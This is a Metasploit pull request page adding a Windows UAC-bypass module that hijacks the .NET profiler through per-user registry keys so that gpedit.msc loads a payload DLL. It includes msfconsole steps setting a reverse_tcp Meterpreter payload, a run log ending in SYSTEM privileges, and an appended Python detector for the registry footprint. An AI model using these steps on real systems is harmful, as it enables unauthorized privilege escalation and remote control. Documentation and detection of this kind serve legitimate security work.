
Add Windows Escalate UAC Protection Bypass (Via dot net profiler) #12516

Merged
merged 4 commits into from Nov 18, 2019


bwatters-r7 commented Oct 31, 2019

This is another one of those auto-elevate registry key UAC bypass bugs. It targets the .Net profiler. Rather than launch an exe, it causes a trusted process (gpedit.msc) to load a dll.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • get a 64-bit meterpreter session
  • background your session
  • use windows/local/bypassuac_dotnet_profiler
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost <lhost>
  • set lport <lport>
  • set session <session>
  • set verbose true
  • run
  • getsystem
  • Verify you are system
  • Do the w00t dance

Example

msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] UUID = 5c710086-74fa-4cce-a3fe-af4d318eed8a
[*] Writing  to HKCU\Software\Classes\CLSID\{5c710086-74fa-4cce-a3fe-af4d318eed8a}\InprocServer32
[-] no implicit conversion of nil into Integer
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-10-30 18:05:45 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...
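A detection-side check for the registry footprint the module's verbose output shows (the HKCU\Environment COR_* values and the per-user CLSID InprocServer32 key). This is an added example, not code from the PR or the module; the "key|value name|data" event line format and the find_profiler_hijack helper are assumptions, and the sample records reuse the CLSID and DLL path from the log above.

```python
import re

# Registry footprint of the per-user .NET profiler hijack described above.
# Line format is a constructed "key|value name|data" triple; real telemetry
# would be Sysmon Event ID 13 (RegistryEvent: Value Set) or an EDR equivalent.
PROFILER_VALUES = {"COR_ENABLE_PROFILING", "COR_PROFILER", "COR_PROFILER_PATH"}
ENV_KEY = r"HKCU\Environment"
CLSID_RE = re.compile(
    r"^HKCU\\Software\\Classes\\CLSID\\\{[0-9a-f-]{36}\}\\InprocServer32$", re.I)
# Locations a standard user can write to; a COM server or profiler DLL living
# here is a strong signal, since legitimate profilers install under Program Files.
USER_WRITABLE_RE = re.compile(
    r"\\(AppData\\Local\\Temp|Users\\[^\\]+\\Downloads)\\", re.I)

# Constructed sample, using the CLSID and DLL path from the module output above.
SAMPLE_EVENTS = [
    r"HKCU\Software\Classes\CLSID\{5c710086-74fa-4cce-a3fe-af4d318eed8a}\InprocServer32|(Default)|C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll",
    r"HKCU\Environment|COR_PROFILER|{5c710086-74fa-4cce-a3fe-af4d318eed8a}",
    r"HKCU\Environment|COR_ENABLE_PROFILING|1",
    r"HKCU\Environment|COR_PROFILER_PATH|C:\Users\msfuser\AppData\Local\Temp\bPwOzAUyQyu.dll",
    r"HKCU\Environment|Path|C:\Users\msfuser\bin",  # benign per-user PATH edit
]


def find_profiler_hijack(lines):
    """Return a list of severity-tagged findings for the registry-set events in lines."""
    findings = []
    env_writes = {}
    for line in lines:
        parts = line.rstrip("\n").split("|", 2)
        if len(parts) != 3:
            continue  # skip malformed records rather than fail the whole scan
        key, name, data = parts
        if key.lower() == ENV_KEY.lower() and name.upper() in PROFILER_VALUES:
            env_writes[name.upper()] = data
        elif CLSID_RE.match(key) and USER_WRITABLE_RE.search(data):
            findings.append(f"high: per-user COM server {key} -> {data}")
    # Profiling is only armed when both the enable flag and the CLSID are set;
    # a user-writable COR_PROFILER_PATH raises the severity further.
    if "COR_ENABLE_PROFILING" in env_writes and "COR_PROFILER" in env_writes:
        path = env_writes.get("COR_PROFILER_PATH", "")
        sev = "high" if USER_WRITABLE_RE.search(path) else "medium"
        findings.append(f"{sev}: per-user .NET profiler enabled, "
                        f"CLSID={env_writes['COR_PROFILER']}, path={path or '<none>'}")
    return findings


if __name__ == "__main__":
    for finding in find_profiler_hijack(SAMPLE_EVENTS):
        print(finding)
```

Machine-wide profilers set by APM agents live under HKLM and a system-level environment, so the per-user HKCU scope is the distinguishing signal here.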


acammack-r7 left a comment

Fun times! Just a little tidying to remember.

bwatters-r7 added 2 commits Nov 15, 2019
Add module docs
@bwatters-r7 bwatters-r7 marked this pull request as ready for review Nov 15, 2019
@bwatters-r7 bwatters-r7 removed the delayed label Nov 15, 2019
@busterb busterb self-assigned this Nov 15, 2019
@busterb busterb added docs and removed needs-docs labels Nov 18, 2019
bcook-r7 pushed a commit that referenced this pull request Nov 18, 2019
@bcook-r7 bcook-r7 merged commit 5936d2c into rapid7:master Nov 18, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Nov 18, 2019

busterb commented Nov 18, 2019

Release Notes

The bypassuac_dotnet_profiler module has been added to the framework. It is a privilege escalation exploit that targets the .Net profiler, causing a trusted process (gpedit.msc) to load a user-controlled DLL.

@tdoan-r7 tdoan-r7 added the rn-modules label Dec 11, 2019